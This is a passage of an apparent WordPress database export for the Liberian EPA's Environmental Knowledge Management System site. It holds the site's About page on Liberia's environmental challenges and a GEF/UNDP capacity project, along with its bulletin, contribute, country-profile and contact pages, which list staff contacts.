href=\"https://securedrive.ekmsliberia.info/\">EKMS CloudDrive</a></li>\n</ul>\n</li>\n<li><a href=\"https://ekmsliberia.info/contact-us/\">Contact Us</a></li>\n<li><a target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://ekmsliberia.info/newsletter/\">Subscribe</a></li>\n<li><a href=\"#\"></a></li></ul>\n	</nav>','Custom Header','','publish','closed','closed','','custom-header','','','2019-12-05 02:17:11','2019-12-05 02:17:11','',0,'https://medical.oceanwp.org/?post_type=oceanwp_library&#038;p=30',0,'oceanwp_library','',0),(34,1,'2017-08-29 01:28:21','2017-08-29 01:28:21','/* Hide header button from 1024pxpx */\n@media (max-width: 1024px) {\n	.hide-1024.elementor-column {\n		display: none;\n	}\n}\n\n/* Color of the footer newsletter form */\n#footer .oceanwp-newsletter-form-wrap input[type=\"email\"] {\n	color: #fff;\n}','oceanwp','','publish','closed','closed','','oceanwp','','','2019-11-13 00:35:54','2019-11-13 00:35:54','',0,'https://medical.oceanwp.org/oceanwp/',0,'custom_css','',0),(59,1,'2019-11-08 06:15:42','2019-11-08 06:15:42','','liberia_flag','','inherit','open','closed','','liberia_flag','','','2019-11-08 09:01:51','2019-11-08 09:01:51','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/liberia_flag.png',0,'attachment','image/png',0),(68,1,'2019-11-08 06:28:39','2019-11-08 06:28:39','<h2>About the EKMS</h2>		\n			<h2>Why was the EKMS created?</h2>		\n		<p>In an effort to bridge knowledge management gaps, the EKMS was created to strengthen institutional coordination between the Environmental Protection Agency (EPA) and Partner governmental institutions as well as non-governmental organizations that have direct linkages with environmental policies and development. It was also created to increase access and dissemination of key information and promote adequate public awareness and education.</p>\n<p>The EKMS is an output of the Cross-Cutting Capacity Development Project (CCCD). The project funded by the GEF and implemented by the EPA in partnership with the UNDP in collaboration with Natural Resources Management Agencies of Liberia. The project is in line with GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<h3>Development Challenge</h3>\n<h4>A1. Global Environmental Challenges</h4>\n<p>Liberia is located on the southwest coast of Africa, and boarders the Ivory Coast, Guinea, and Sierra Leone. Liberia is divided into 15 counties, which are subdivided into 90 districts. Although Liberia is a rather small country, it has significant biodiversity. There are 600 bird species, 150 mammals, 75 reptiles and over 2000 flowering plants. Some notable species in Liberia include western chimpanzees, forest elephants, and leopards. Liberia also has rich forests; around 42% of the Upper Guinea Forest of West Africa is contained within Liberia (Republic of Liberia, 2014; Republic of Liberia, 2004). Liberia also has numerous natural resources such as timber, rubber, gold diamonds, and iron ore. Economically, the forestry and agriculture sectors are two of the most important sectors in Liberia. Agriculture accounts for over 70% of livelihoods (Dorliae, 2012).</p>\n<p>Liberia faces numerous environmental challenges including land degradation, fragmentation, deforestation, soil erosion, and pollution. The dependence on forestry presents a unique environmental risk as Liberia’s forest is part of the West African Hotspot. This (once) rich ecosystem has faced severe deforestation; only ten percent of the original forest remains, of which around 40% lies in Liberia. Unfortunately, this remaining forest is at risk serious risk of deforestation. Over the past two centuries, Liberia has lost over 60% of its forest cover (Republic of Liberia, 2004), and deforestation rates have increased since 2000. Increases in deforestation and land degradation are largely due to displaced people clearing land. Also contributing to deforestation, biodiversity loss, and land degradation is unsustainable farming practices, mining, charcoal production, invasive species, hunting, and unregulated timber extraction. Poaching is also rampant and mitigation measures are lacking; the draft Wildlife Management and Protected Areas Act remains in draft form (Dorliae, 2012).</p>\n<p>Climate change also poses a real threat to Liberia. Among other threats, Liberia’s economy and human health could be threatened by rising temperatures and water scarcity. Currently, the country does not have strong capacities for mitigation and adaptation; Liberia has no institutions that offer climate change education or research programs (although, the University of Liberia does offer programs on the environment). Additionally, there are no organized or coordinated programs for meteorological, hydrological, or climate research and observation. Currently, only fragmented services are available. Along with a lack of observation networks, government bodies are hindered by inadequately-trained staff (Environmental Protection Agency of Liberia, 2013).</p>\n<p>Although aware of the environmental situation, Liberia has struggled to address these environmental issues. The civil wars, which lasted for more than 10 years, served to exacerbate the situation. Poverty also presents a serious challenge; causing degradation and drawing attention and resources from environmental concerns. Over 60% of Liberians live in poverty. Of these, over 40% of citizens live in extreme poverty (Dorliae, 2012). The outbreak of Ebola in 2014 also threatened Liberia’s progress, as the crisis became a priority for the government and stretched already limited resources. Fortunately in January 2016 the outbreak was declared resolved. Overall, there has been slow progress in sustainable development and meeting obligations under the Rio Conventions.</p>\n<h4>Root Causes</h4>\n<p>There are a few key root causes of environmental degradation in Liberia. The most critical include: human settlements and population pressures; shifting cultivation; timber exploitation; and rubber plantations. More generally, root causes are related to over-exploitation of biological resources; poverty; political instability and wars; education; and inadequate law enforcement (Republic of Liberia, 2004). From a reporting perspective, one root cause of Liberia’s development challenges is the fact that Focal Points are located in different agencies, which thereby limits coordination and collaboration between them.</p>\n<h4>A2. Capacity Barriers</h4>\n<p>Liberia has undertaken numerous initiatives to address environmental issues. Despite the achievements Liberia made, Liberia continues to face important challenges to meeting environmental goals. As a Rio Convention mainstreaming project, the proposed strategy sets out to meet barriers identified in Liberia’s 2006 National Capacity Self-Assessment (NCSA), which was undertaken though a consultative process and participatory approach that involved numerous stakeholders from various sectors. Through the inclusive and consultative process of the NCSA, stakeholders identified a number of areas that explain the difficulty in fulfilling the obligations of the Rio Conventions. The NCSA identified the following barriers that cut across the three Rio Conventions:</p>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Inadequate public awareness and education/training</li>\n<li>Inadequate institutions and institutional frameworks</li>\n<li>Inadequate political commitment</li>\n<li>Inadequate planning skills and resources, as well as incomplete structures at all levels of policy implementation</li>\n<li>Inadequate financial resources and economic framework</li>\n<li>Inadequate strategic plans and implementation</li>\n<li>Inadequate access to information</li>\n<li>Inadequate policies and legal frameworks</li>\n<li>Low level of involvement of civil society</li>\n<li>Inadequate natural resources management systems</li>\n<li>Lack of institutional capacities</li>\n<li>Lack of effective mechanism for information processing and sharing</li>\n<li>\n<p>Poor governance</p>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul><p>Liberia’s Agenda for Transformation 2012-2017 confirmed many of the barriers identified in the NCSA. Specifically, the agenda noted the following barriers:</p>\n<ul>\n<li>Weak technical, administrative and managerial capacities;</li>\n<li>Weak institutional coordination;</li>\n<li>Unclear policies and mechanisms to enable effective participation by especially non-state actors; at the national and local levels;</li>\n<li>Limited stakeholder participation in planning and decision-making processes;</li>\n<li>Limited dissemination of key information (Republic of Liberia, 2013).</li>\n</ul>\n<p>Barriers were also reaffirmed in the Liberia Constraints Analysis (Government of Liberia, 2013).</p>\n<h4>A.3 Consistency with National Priorities</h4>\n<p>The country has demonstrated a desire to improve the environmental policy framework with the preparation of multiple new policies including the National Environmental Protection and Management Law (2003), the National Environmental Policy (2003), the establishment of an Environmental Protection Agency, in 2003, the National Forestry Law (2000), and the New Mineral and Mining Laws (2000).</p>\n<p>In the first Poverty Reduction Strategy, the environment was considered a cross-cutting issue. Some achievements made during implementation of this strategy include passage of the Community Rights Law, which established a system for community harvesting of forests. Efforts were also undertaken to improve protected areas management and increase the size/number of protected areas. In Liberia’s medium-term Poverty Reduction Strategy II (2012-2018) there is a fifth pillar: Cross-Cutting Issues which includes the environment. Additionally, environmental issues have been integrated into other pillars of the strategy specifically the economic pillar.</p>\n<p>During the Liberia Rio +20 National Consultative Workshop, Liberia identified five issues that are essential for accomplishing its development goals and objectives. Additionally, Liberia has also developed a National Capacity Development Strategy (2010), which calls for investing in areas needed to achieve development goals.</p>\n<p>The project will assist the Government of Liberia to achieve the national priorities it has set in Liberia RISING 2030. The aim of this is to transform Liberia through a new development strategy, which was launched in December 2012. The overall objective is to turn Liberia into a middle income country by 2030.</p>\n<p>The project is also in line with Liberia’s National Biodiversity Strategy and Action Plan II (NBSAP) which aims to, as part of Liberia’s commitment to the Millennium Development Goals, and in line with the National Environmental Policy of Liberia, assist the people of Liberia to acknowledge and exercise responsible stewardship over biological resources to meet the needs of the present without endangering the ability of future generations to meet their own needs. Some of the goals are to protect critical ecosystems, create biodiversity awareness, and increase commitment to sustainable use of biological diversity (Republic of Liberia, 2017).</p>\n<p>Liberia’s 2008 National Adaptation Plan of Action (NAPA), as a response to the impacts of climate change, aligns with National Environmental Policy which calls for the sustainable management of Liberia’s environment and natural resources. The NAPA also aims to establish synergies between adaptation and national development plans, such as the National Reconstruction and Development Plan, Millennium Development Goals, and the National Biodiversity and Strategy Action Plan. The NAPA identifies key adaptation needs and list priority actions, such as enhancing resilience to increasing rainfall variability through agriculture, to address the needs.</p>\n<p>This project is also in line with Liberia’s UNDAF 2013-2017. The UN Country Team decided that the new UNDAF would also take into account the requirements of Delivering as One. Thus, in addition to the Strategic Framework and Results Matrix, the UNDAF is accompanied by a detailed Costed Action Plan. Together they constitute the One Programme. The four pillars of the One UN Programme are:</p>\n<ul>\n<li>Peace, Security, Rule of Law</li>\n<li>Sustainable Economic Transformation</li>\n<li>Human Development</li>\n<li>Inclusive Governance and Public Institutions</li>\n</ul>\n<p>The UNDAF (One Programme) also aligns with Liberia’s National medium-term strategy, known as the Agenda for Transformation. The Agenda for Transformation is based on five pillars:</p>\n<ul>\n<li>Peace, Security and Rule of Law</li>\n<li>Economic Transformation</li>\n<li>Human Development</li>\n<li>Governance and Public Institutions</li>\n<li>Cross-cutting issues</li>\n</ul>\n<p>The Agenda contains a specific goal to improve management of the environment to safeguard sustained economic development and growth. Specific actions called for in this agenda include: a) developing environmental quality standards and regulatory tools; b) harmonizing environmental laws and policies to ensure improved environmental management; c) undertake a gap analysis of sectoral environmental laws and policies; d) create environmental awareness; e) create training and education programmes; f) develop a public awareness strategy and campaign; g) train professionals in effective environmental management; strengthen environmental units in ministries through training and improved coordination; and h) develop a system to collect and disseminate environmental information/data.</p>\n<p>The design and implementation of the proposed CCCD project would also take into account the development plans of other bilateral and multilateral donors in Liberia to ensure appropriate alignment as well as to leverage the necessary co-financing.</p>\n<h4>A.4 Baseline Scenario and Associated Baseline Projects</h4>\n<p>Liberia is struggling to fulfill many of the objectives set forth in the Rio Conventions. Many of the developed frameworks and plans for action face limited implementation due to limited government resources, limited human capacity, and a lack of appropriate technologies. Liberia struggles with an inadequate system for information and knowledge management and the poor information sharing between or within sectors. Additionally, the country’s degraded and limited infrastructure combined with a low technical and institutional capacity severely limit Liberia’s environmental governance framework and thus its potential to conserve the natural environment, let alone secure long-term benefits from it. The civil war only exacerbated the situation, leading to displacement of individuals and unprecedented amounts of resource exploitation. Although Liberia is recovering from the war, 85% of the population still lives below the international poverty line. Liberia’s HDI (2014) is 0.430, ranking the country 177 out of 188 (UNDP, 2015). </p>\n<p>Multilateral donor agencies specifically in the field of natural resource management currently working in Liberia now include the African Development Bank, GEF, IFAD, UNDP, and the World Bank. Bilateral donor agencies are also very important development partners from, Norway, and the United States (USAID), as well as other inter-governmental organizations such as the CARE International, Conservation International, and the Society for the Conservation of Nature in Liberia. </p>\n<p>National environmental NGOs, with assistance from Conservation International, organized themselves into the Alliance for Conservation in Liberia. The goal of this body is to ensure that all local NGOs who are or would like to be involved in conservation of biodiversity can do so without overlapping efforts or functions. </p>\n<p>Liberia has made significant progress since the end of the civil war by investing in infrastructure, revising existing policies and laws, and reviewing the mandates of political institutions to reduce duplication. One area of progress is updating the mandates and restructuring Government ministries and agencies to improve effectiveness and efficiency. Liberia has also established new agencies like the Rural and Renewable Energy Agency to promote the sustainable development strategy. Reforms in Liberia have been undertaken on an institution-by-institution basis and have not been considered on a holistic basis, nor have they increased coordination and harmonization. </p>\n<p>Between 2010 and 2012, UNEP implemented a global project, entitled Piloting Integrated Processes and Approaches to Facilitate National Reporting to Rio Conventions that included Liberia as a beneficiary country. This project focused on helping Liberia (among other countries) to better organize modalities for accessing and preparing their national reports. Notwithstanding the capacities developed, a number of important capacities remained to be developed, such as the standardization of data collection and information analysis, improved coordination and collaboration to facilitate streamlined national reporting, and increased awareness and stakeholder engagement in the national reporting process. During the project implementation, activities under component 4 will undertake an updated assessment of the systemic, institutional, and individual capacities that remain a priority to be developed in order to meet and sustain Rio Convention obligations.</p>\n<p>A description of on-going projects that this project will coordinate with appears in section C.4 Partnerships. Relevant completed UNDP GEF projects that form the baseline of this project include:</p>\n<h4>Associated Baseline Projects</h4>\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<th><strong>Project Name</strong></th>\n<th><strong>Description of project’s alignment with CCCD project</strong></th>\n</tr>\n<tr>\n<td>GEF Enhancing Resilience to Climate Change by Mainstreaming Adaption Concerns into Agricultural Sector Development in Liberia (Ending September 2015)</td>\n<td>The expected results of this project included improving the rural communities’ capacities, increasing sustainable livestock and crop production, and reducing poverty.</td>\n</tr>\n<tr>\n<td>FAO to Support MOA Statistics and Information Management System</td>\n<td>The objective of this project was to support the implementation of a linked information and knowledge system.</td>\n</tr>\n<tr>\n<td>Smallholder Agricultural Productivity Enhancement and Commercialization Project (SAPEC)</td>\n<td>The goal this project was to reduce rural poverty and household food insecurity. One component is capacity building and institutional strengthening, which includes trainings.</td>\n</tr>\n</tbody>\n</table>\n<h3>B. Strategy</h3>\n<h4>B.1 Alternative Strategies</h4>\n<p>During the conceptualization of the present cross-cutting capacity development project, a number of alternative approaches were considered, taking into account the current set of interventions currently underway and planned for Liberia. An important starting point was the findings and recommendations of the National Capacity Self-Assessment, followed by a consideration of the lessons learned from other projects, such as a review of the Final Evaluation of the Mainstreaming and Capacity Building for Sustainable Land Management project . A review of the recommendations contained in the more recent Rio Convention reports was also considered, such as the 2016 National Biodiversity Strategy and Action Plan.</p>\n<p>The single most common cross-cutting capacity development constraint that was recurring in the various assessments and action plans was the significantly low institutional capacity for managing data and information for improved planning and decision-making to meet and sustain Rio Convention obligations. Taking into account the GEF-6 Cross-Cutting Capacity Development priority of strengthening mainstreaming capacities as a strategy to meet the duality of national development and global environmental priorities, this project’s objective was formulated.</p>\n<p>From an implementation perspective, a number of alternative approaches were considered to meet the stated objective. One was for Liberia to continue the same approach of implementing focal area projects, and to strengthen the key set of systemic, institutional, and individual capacities through focal area projects. However, this approach will not address the capacity development gaps nor result in creating synergies. Another aspect considered was to have different components executed by different agencies. The challenge with this approach is the relative weak coordination among government ministries and agencies – indeed an important capacity development need that the project would help address. A related issue was the government’s keen desire to use the project to strengthen national capacity of the Environmental Protection Agency.</p>\n<p>The selected strategy was based on the real need to strengthen meaningful capacities that can be successfully institutionalized. The key here is not for the project to take on more than the Environmental Protection Agency can absorb, but rather, through the process of project execution, learn how to formulate better plans and make better decisions regarding the global environment within the framework of their institutional mandates. That is, this project places a premium on address institutional sustainability by emphasizing the execution of the project through a wide range of learning-by-doing exercises by the EPA. This will require that they reach out of other government ministries and agencies to meet complementary and shared mandates as well as to effectively negotiate resolution of real or perceived conflicts of interests that come about through Rio Convention mainstreaming.</p>\n<h4>B.2 Selected Scenario</h4>\n<p>This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.</p>\n<p>The uniqueness of this project is centered on its cross-cutting nature. Other projects currently under implementation focus on strengthening targeted capacities under one of the three Rio Conventions, and thus have a relatively narrower system boundary than the CCCD programme approach. In the absence of the CCCD project, there remains likelihood that Liberia would not realize its full potential for sustainable development due to limited coordination and decentralization. Additionally, it is likely that environmental management in Liberia would continue to focus on traditionally narrow constructs.</p>\n<h4>B.3 Knowledge Management</h4>\n<p>This project is part of a portfolio of capacity building interventions in Liberia that encourages regional cooperation and knowledge and information exchanges. Partnerships and collaboration will also catalyze the transfer of knowledge and competencies among actors and stakeholders. Lessons learned from other projects will be included, as appropriate (for example, in the training programmes and the knowledge management system). This project also contains specific activities to increase the use and sharing of knowledge, and to strengthen critical thinking in understanding the implications of the global environment towards the pursuit of sustainable development. These include a series of learning-by-doing workshops and public dialogues among a diverse set of stakeholders. Component one focuses on establishing a system for collecting and sharing information and data between the institutions for better environmental management and the fulfillment of the obligations of the Rio Conventions (an EKMS).</p>\n<p>The system that the project developed is the ideal platform to share lessons learned and experiences with the main stakeholders of environmental information and knowledge. Universities and research centers will be at the center of the information and knowledge management and will ensure the integration of innovative scientific and technical information into the project setup and into other baseline initiatives.</p>\n<p>The project’s approach to knowledge management is consistent with the International Resource Panel Report on Policy Coherence of the Sustainable Development Goals which emphasizes the need for developing widespread awareness and creating and disseminating decision support tools.</p>		\n			<h2>What does the EKMS include?</h2>		\n		<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS) is an integrated online knowledge platform which strive to draw on and complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector and external partners to scale up environmental initiatives.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>The EKMS provides free and open access to information from key government and other institutions in Liberia relating to the implementation of the Rio Conventions – The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. The EKMS is deployed under the supervision of Environmental Protection Agency (EPA) in collaboration with twelve relevant government institutions. Information access on this platform include reports, publications, case studies, tools and guidelines, institution’s technical documents, and other related materials.</p>\n<!-- /wp:paragraph -->\n<!-- wp:paragraph -->\n<p>Additionally, the EKMS provides a platform for government institutions and other contributors to share latest blogs, news and stories related to the Rio Conventions implementation process.</p>\n<!-- /wp:paragraph -->		\n			<h2>Acknowledgement</h2>		\n		<p>The EPA gratefully acknowledges financial support from the Global Environmental Facility (GEF), through the United Nations Development Programme (UNDP), for the development of this Environmental Knowledge Management System (EKMS).</p>','About','','publish','closed','closed','','about','','','2022-09-02 10:51:06','2022-09-02 10:51:06','',0,'https://ekmsliberia.info/?page_id=68',0,'page','',0),(69,1,'2019-11-08 06:28:39','2019-11-08 06:28:39','','About','','inherit','closed','closed','','68-revision-v1','','','2019-11-08 06:28:39','2019-11-08 06:28:39','',68,'https://ekmsliberia.info/2019/11/08/68-revision-v1/',0,'revision','',0),(72,1,'2019-11-08 06:29:21','2019-11-08 06:29:21','<h1>You are on the EKMS Bulletin Board:</h1>		\n		This bulletin provides a space for funding announcements, jobs, and other related openings.		\n			<h4>Announcements/Vacancies</h4>		\n			<h4>Posted</h4>		\n			<h4>Closed</h4>','EKMS Bulletins','','publish','closed','closed','','vacancy','','','2021-08-18 17:05:40','2021-08-18 17:05:40','',0,'https://ekmsliberia.info/?page_id=72',0,'page','',0),(73,1,'2019-11-08 06:29:21','2019-11-08 06:29:21','','Vacancy','','inherit','closed','closed','','72-revision-v1','','','2019-11-08 06:29:21','2019-11-08 06:29:21','',72,'https://ekmsliberia.info/2019/11/08/72-revision-v1/',0,'revision','',0),(74,1,'2019-11-08 06:42:46','2019-11-08 06:42:46','<h1>Contribute a knowledge resource to the EKMS</h1>		\n		<p>Ekmsliberia.info is managed by the <a style=\"color: #00ccff;\" href=\"https://ekmsliberia.info/institution/environmental-protection-agency/\" target=\"_blank\" rel=\"noopener\">Environmental Protection Agency (EPA)</a> of Liberia in collaboration with several partner governmental and other institutions.</p><p>We are interested to hear from individuals and civil society groups who might wish to complement a growing agenda on the Rio Conventions within the Natural Resource Management Sector in Liberia. If you would like to contribute a knowledge resource to the Environmental Knowledge Management System (EKMS) of Liberia, please fill out the appropriate forms below.</p><p>This site focuses on the three Rio Conventions: The United Nations Framework Convention on Climate Change (UNFCCC), United Nations Convention on Biological Diversity (UNCBD) and United Nations Convention to Combat Desertification (UNCCD). Therefore, your resources should be linked to climate change, biodiversity and desertification. Resources may include links to online portals, scientific/peer-review publications, technical documents/reports, policy briefs, educational/training materials, multimedia materials and more. We would also like partner organizations to send their action pledges.</p><p>To learn about becoming a member of the EKMS Community, visit our <a href=\"/join-the-community\" target=\"_blank\" rel=\"noopener\">‘Join the Community’</a> page.</p><p><a style=\"color: #3366ff;\" href=\"https://ekmsliberia.info/contact-us/\" target=\"_blank\" rel=\"noopener\">Contact us</a> if you are interested in contributing to the EKMS!</p>','Contribute','','publish','closed','closed','','contribute','','','2021-08-19 14:36:34','2021-08-19 14:36:34','',0,'https://ekmsliberia.info/?page_id=74',0,'page','',0),(75,1,'2019-11-08 06:42:46','2019-11-08 06:42:46','','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-08 06:42:46','2019-11-08 06:42:46','',74,'https://ekmsliberia.info/2019/11/08/74-revision-v1/',0,'revision','',0),(76,1,'2019-11-08 06:43:14','2019-11-08 06:43:14','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Republic of Liberia</h2>		\n		<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia approximately 111,369 km<sup>2</sup>, is the fifth smallest country in Africa.</p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005). The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km<sup>2</sup> consist of water, and the remaining 96,319 km<sup>2</sup> are land.</p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.</p><p>Liberia‘s Exclusive Economic Zone (EEZ) is 229,700 km<sup>2</sup>, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).</p>','Country Profile','','publish','closed','closed','','country-profile','','','2019-11-27 02:15:32','2019-11-27 02:15:32','',0,'https://ekmsliberia.info/?page_id=76',0,'page','',0),(77,1,'2019-11-08 06:43:14','2019-11-08 06:43:14','','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-08 06:43:14','2019-11-08 06:43:14','',76,'https://ekmsliberia.info/2019/11/08/76-revision-v1/',0,'revision','',0),(80,1,'2019-11-08 06:44:22','2019-11-08 06:44:22','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" 